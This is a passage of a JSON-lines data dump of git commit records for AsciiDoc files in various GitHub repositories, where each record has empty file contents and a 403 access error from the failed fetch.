2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_file":"_posts\/2016-06-25-Should-advanced-object-destructuring-patterns-be-avoided-due-to-readability-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"371d988719b36a702c5ebf6b6764601ff09053e7","subject":"Update 2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","message":"Update 2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0371bd0832d90c5e7689fd43d65a7119c9be65b","subject":"CI init","message":"CI init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"CI.adoc","new_file":"CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4e026cf15c9e88e740d4ff9966df9539fa05da3","subject":"Added readme","message":"Added readme\n","repos":"FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,FTSRG\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples,FTSRG\/viatra-cep-examples,viatra\/viatra-cep-examples,viatra\/viatra-cep-examples","old_file":"iot-demo\/README.asciidoc","new_file":"iot-demo\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/FTSRG\/viatra-cep-examples.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f549c70f012396e1bc22c97d2583bc6167596ff8","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53b06cd744aab2b53c1fd38e92bad3b6c38439ab","subject":"Added some documentation","message":"Added some documentation\n","repos":"netdava\/jbakery,netdava\/jbakery","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netdava\/jbakery.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e462a52348f55ff93f352b9dab8eefa1fb72621","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"johnhaddon\/gaffer,johnhaddon\/gaffer,paulondc\/gaffer,andrewkaufman\/gaffer,davidsminor\/gaffer,davidsminor\/gaffer,chippey\/gaffer,ImageEngine\/gaffer,appleseedhq\/gaffer,hradec\/gaffer,davidsminor\/gaffer,ImageEngine\/gaffer,cedriclaunay\/gaffer,cedriclaunay\/gaffer,GafferHQ\/gaffer,johnhaddon\/gaffer,andrewkaufman\/gaffer,lucienfostier\/gaffer,boberfly\/gaffer,boberfly\/gaffer,cedriclaunay\/gaffer,ivanimanishi\/gaffer,goddardl\/gaffer,ivanimanishi\/gaffer,GafferHQ\/gaffer,ImageEngine\/gaffer,GafferHQ\/gaffer,ivanimanishi\/gaffer,lucienfostier\/gaffer,chippey\/gaffer,andrewkaufman\/gaffer,boberfly\/gaffer,appleseedhq\/gaffer,davidsminor\/gaffer,ImageEngine\/gaffer,hradec\/gaffer,johnhaddon\/gaffer,lucienfostier\/gaffer,GafferHQ\/gaffer,goddardl\/gaffer,boberfly\/gaffer,paulondc\/gaffer,paulondc\/gaffer,hradec\/gaffer,hradec\/gaffer,lucienfostier\/gaffer,chippey\/gaffer,chippey\/gaffer,paulondc\/gaffer,ivanimanishi\/gaffer,johnhaddon\/gaffer,andrewkaufman\/gaffer,appleseedhq\/gaffer,goddardl\/gaffer,GafferHQ\/gaffer,appleseedhq\/gaffer,andrewkaufman\/gaffer,cedriclaunay\/gaffer,hradec\/gaffer,goddardl\/gaffer","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GafferHQ\/gaffer.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"526683e8770479e697a1194637647a098f60f9ef","subject":"first shot of a doc","message":"first shot of a doc\n","repos":"nlalevee\/jst","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nlalevee\/jst.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa0b30fae218561f532548b6695a28f5e3d291ef","subject":"y2b create post New Custom XBOX 360 Controllers!","message":"y2b create post New Custom XBOX 360 Controllers!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-24-New-Custom-XBOX-360-Controllers.adoc","new_file":"_posts\/2013-09-24-New-Custom-XBOX-360-Controllers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cbf41e4e053373c3c8cbd0c168b9dd6e0ca53a0","subject":"Update 2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","message":"Update 
2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","new_file":"_posts\/2018-11-28-Pu-der-Bar-von-Martin-Heidegger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58881452ec3cad293cd019c882ba57204aa283dc","subject":"Create do-contribution-file-es.adoc","message":"Create do-contribution-file-es.adoc\n\nSpanish translation for do-contribution-file.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-contribution-file-es.adoc","new_file":"src\/do\/do-contribution-file-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9526ddbf7cb79af6823b364581a3ab662e13ae45","subject":"Fixed a formatting error","message":"Fixed a formatting error\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week03.asciidoc","new_file":"asciidoc\/week03.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0dc3e9cb77db943c17be90ca067936826c1ca92","subject":"Update 2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","message":"Update 2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","new_file":"_posts\/2015-11-05-Being-Agile-Means-The-Architecture-Should-Evolve-As-Well.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24cda762f480591efb62014c1f5347cd9ca47f21","subject":"Update 2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","message":"Update 2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","new_file":"_posts\/2016-04-29-P-F-command-button-doesnt-work-at-first-click-but-works-afterwards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af2f8f6d65fd2cc58c108ca909e381cc5b052c19","subject":"cleaning up words (thx @tiffanyfj)","message":"cleaning up words (thx 
@tiffanyfj)\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_file":"developer-tools\/java\/chapters\/ch02-basic-concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d141cb27e8c0498186b780573280b633c007657","subject":"Update 2016-06-29-New-post.adoc","message":"Update 2016-06-29-New-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-29-New-post.adoc","new_file":"_posts\/2016-06-29-New-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388cb19180252cc6506e4f0ee460ddfd1cac05da","subject":"Document scheduled taks configuration","message":"Document scheduled taks configuration\n","repos":"savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,savoirfairelinux\/santropol-feast","old_file":"docs\/cronjob.adoc","new_file":"docs\/cronjob.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8f997c84aeeb2b0aedc185c205bceea5f901893c","subject":"Added start of TUF\/UPTANE docs","message":"Added start of TUF\/UPTANE docs\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp","old_file":"docs\/tuf-uptane.adoc","new_file":"docs\/tuf-uptane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"58d4dc9a643979a14e3501b8decd2ba292bc764b","subject":"Deleted _posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","message":"Deleted _posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_file":"_posts\/2017-01-01-Streaming-Video-di-OSMC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdff60b01d92fec5f59d718721ea3d4e3edb9b2a","subject":"Update 2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","message":"Update 
2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","new_file":"_posts\/2015-06-25-Desarrollo-de-una-aplicacion-desde-cero-La-capa-de-negocio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fef594b262986e59956083969b4a1f3ebfed5f99","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-docker,gravitee-io\/gravitee-docker","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4cb224652ecd6c0f75d1e380a5b2618f78f2dbe6","subject":"[ci skip] add contributing guidelines","message":"[ci skip] add contributing guidelines\n","repos":"marcosbarbero\/spring-cloud-starter-zuul-ratelimit,marcosbarbero\/spring-cloud-zuul-ratelimit,marcosbarbero\/spring-cloud-zuul-ratelimit","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcosbarbero\/spring-cloud-starter-zuul-ratelimit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2cd5193330819daf9d42039a2eed02c96b3e1c","subject":"Update 2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","message":"Update 2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","new_file":"_posts\/2016-11-14-Episode-79-Questions-That-Drift-To-the-Future-past.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1ff2b5dc7e78deeb991d88db07b29cdd5a0fc7d","subject":"Update 2017-09-22-Limited-Internet.adoc","message":"Update 2017-09-22-Limited-Internet.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-22-Limited-Internet.adoc","new_file":"_posts\/2017-09-22-Limited-Internet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ac460563f1ba3bf9b5011a27100d44a5100b41b","subject":"Make 'Filter' look more code-like","message":"Make 'Filter' look more code-like","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"docs\/src\/docs\/asciidoc\/guides\/rest.adoc","new_file":"docs\/src\/docs\/asciidoc\/guides\/rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c01f9388239c7da01627ff2b5a204faf14aa414f","subject":"Update 2016-04-11-Home.adoc","message":"Update 2016-04-11-Home.adoc","repos":"yahussain\/yahussain.github.io,yahussain\/yahussain.github.io,yahussain\/yahussain.github.io,yahussain\/yahussain.github.io","old_file":"_posts\/2016-04-11-Home.adoc","new_file":"_posts\/2016-04-11-Home.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yahussain\/yahussain.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aead1468753803ea0abbfd1a7a53b858cb71997","subject":"Update 2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","message":"Update 2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","new_file":"_posts\/2017-06-20-Using-MATLAB-to-control-hardware-1-Message-Passing-Systems.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f409460569b0846e34ea1bcc08b93aa2584f73","subject":"Update 2016-03-28-Happy-Easter.adoc","message":"Update 2016-03-28-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_file":"_posts\/2016-03-28-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce670a704e2a1dbc8564529ad0782e82ca185696","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d69f9b9686887a0fe44f974f52fea51aa83e22","subject":"Update 2015-10-26-Service-Worker.adoc","message":"Update 2015-10-26-Service-Worker.adoc","repos":"wheeliz\/tech-blog,wheeliz\/tech-blog,wheeliz\/tech-blog","old_file":"_posts\/2015-10-26-Service-Worker.adoc","new_file":"_posts\/2015-10-26-Service-Worker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wheeliz\/tech-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fca198307903aecf2e2024038973ec96f154236","subject":"Update 2015-12-06-Clojure-X-2015.adoc","message":"Update 
2015-12-06-Clojure-X-2015.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2015-12-06-Clojure-X-2015.adoc","new_file":"_posts\/2015-12-06-Clojure-X-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"471f8c91e98d0b798fcf82d6bcfe4925ddef427e","subject":"Update 2016-08-30-About-me.adoc","message":"Update 2016-08-30-About-me.adoc","repos":"rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io,rage5474\/rage5474.github.io","old_file":"_posts\/2016-08-30-About-me.adoc","new_file":"_posts\/2016-08-30-About-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rage5474\/rage5474.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0debd9c1c7e31667ab9ca894b39a0f4f981f501","subject":"#12 AsciiDoctor general template","message":"#12 AsciiDoctor general template\n","repos":"SopraSteriaGroup\/initiatives_backend_ideas","old_file":"src\/docs\/asciidoc\/index.adoc","new_file":"src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SopraSteriaGroup\/initiatives_backend_ideas.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fe34bb7273017ff1ca822ffba831582ad163053","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72907246a08c1b77dba5607b730a4f77a38e6783","subject":"troubleshooting images","message":"troubleshooting images\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f519ed5b656db50497bb9d26664a85bfe0d15bdd","subject":"Renamed '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system.adoc' to '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc'","message":"Renamed '_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system.adoc' to 
'_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc'","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_file":"_posts\/2018-09-27-repair-grub2-lvm2-luks-encrypted-system-volume-group-not-found.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2860b15710c9e55816d1309eab938390ce2bf5d4","subject":"Create FRP.adoc","message":"Create FRP.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"FRP.adoc","new_file":"FRP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"1ef3cbd8f28b383bf7dd6eac856ab00d7f774c90","subject":"Git test svg inline","message":"Git test svg inline\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git.adoc","new_file":"Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"99084f4b1c7c6fb2c6ff58678a8823baee29a4e1","subject":"[CAMEL-10786] Adding a missing doc resource","message":"[CAMEL-10786] Adding a missing doc resource\n","repos":"dmvolod\/camel,pmoerenhout\/camel,pkletsko\/camel,rmarting\/camel,drsquidop\/camel,apache\/camel,yuruki\/camel,sverkera\/camel,onders86\/camel,prashant2402\/camel,lburgazzoli\/camel,adessaigne\/camel,driseley\/camel,gnodet\/camel,jonmcewen\/camel,jkorab\/camel,tdiesler\/camel,nicolaferraro\/camel,mgyongyosi\/camel,adessaigne\/camel,jamesnetherton\/camel,apache\/camel,sverkera\/camel,apache\/camel,gnodet\/camel,anoordover\/camel,akhettar\/camel,scranton\/camel,tdiesler\/camel,nboukhed\/camel,pmoerenhout\/camel,apache\/camel,anoordover\/camel,akhettar\/camel,curso007\/camel,mcollovati\/camel,alvinkwekel\/camel,tadayosi\/camel,allancth\/camel,gautric\/camel,driseley\/camel,mgyongyosi\/camel,NickCis\/camel,Thopap\/camel,DariusX\/camel,adessaigne\/camel,onders86\/camel,snurmine\/camel,jkorab\/camel,pkletsko\/camel,snurmine\/camel,pax95\/camel,davidkarlsen\/camel,anoordover\/camel,pkletsko\/camel,acartapanis\/camel,nikhilvibhav\/camel,CodeSmell\/camel,DariusX\/camel,lburgazzoli\/camel,jamesnetherton\/camel,anoordover\/camel,gnodet\/camel,tlehoux\/camel,CodeSmell\/camel,kevinearls\/camel,tadayosi\/camel,isavin\/camel,driseley\/camel,rmarting\/camel,apache\/camel,akhettar\/camel,prashant2402\/camel,nboukhed\/camel,apache\/camel,jamesnetherton\/camel,anoordover\/camel,nboukhed\/camel,onders86\/camel,christophd\/camel,snurmine\/camel,yuruki\/camel,objectiser\/camel,NickCis\/camel,gnodet\/camel,dmvolod\/camel,drsquidop\/camel,driseley\/camel,isavin\/camel,gnodet\/camel,lburgazzoli\/camel,isavin\/camel,Fabryprog\/camel,jonmcewen\/camel,nicolaferraro\/camel,rmarting\/camel,nikhilvibhav\/camel,christophd\/camel,anoordover\/camel,mcollovati\/camel,mgyongyosi\/camel,drsquidop\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,mgyongyosi\/camel,rmarting\/camel,jonmcewen\/camel,curso007\/camel,NickCis\/camel,kevinearls\/c
amel,Thopap\/camel,scranton\/camel,pmoerenhout\/camel,gautric\/camel,driseley\/camel,davidkarlsen\/camel,yuruki\/camel,akhettar\/camel,tdiesler\/camel,kevinearls\/camel,lburgazzoli\/apache-camel,punkhorn\/camel-upstream,lburgazzoli\/camel,ullgren\/camel,adessaigne\/camel,objectiser\/camel,NickCis\/camel,nikhilvibhav\/camel,jamesnetherton\/camel,cunningt\/camel,anton-k11\/camel,Fabryprog\/camel,jamesnetherton\/camel,pmoerenhout\/camel,tadayosi\/camel,prashant2402\/camel,drsquidop\/camel,onders86\/camel,cunningt\/camel,acartapanis\/camel,Thopap\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,rmarting\/camel,salikjan\/camel,mcollovati\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,yuruki\/camel,anton-k11\/camel,Thopap\/camel,kevinearls\/camel,zregvart\/camel,scranton\/camel,Fabryprog\/camel,zregvart\/camel,gautric\/camel,davidkarlsen\/camel,ullgren\/camel,zregvart\/camel,snurmine\/camel,jkorab\/camel,zregvart\/camel,christophd\/camel,ullgren\/camel,sverkera\/camel,yuruki\/camel,onders86\/camel,allancth\/camel,christophd\/camel,tdiesler\/camel,kevinearls\/camel,jkorab\/camel,salikjan\/camel,nboukhed\/camel,sverkera\/camel,NickCis\/camel,nicolaferraro\/camel,sverkera\/camel,lburgazzoli\/apache-camel,adessaigne\/camel,anton-k11\/camel,cunningt\/camel,scranton\/camel,tdiesler\/camel,punkhorn\/camel-upstream,tdiesler\/camel,alvinkwekel\/camel,tlehoux\/camel,allancth\/camel,dmvolod\/camel,anton-k11\/camel,prashant2402\/camel,jonmcewen\/camel,pmoerenhout\/camel,tlehoux\/camel,isavin\/camel,sverkera\/camel,alvinkwekel\/camel,anton-k11\/camel,acartapanis\/camel,tlehoux\/camel,scranton\/camel,kevinearls\/camel,pax95\/camel,objectiser\/camel,dmvolod\/camel,isavin\/camel,pkletsko\/camel,tl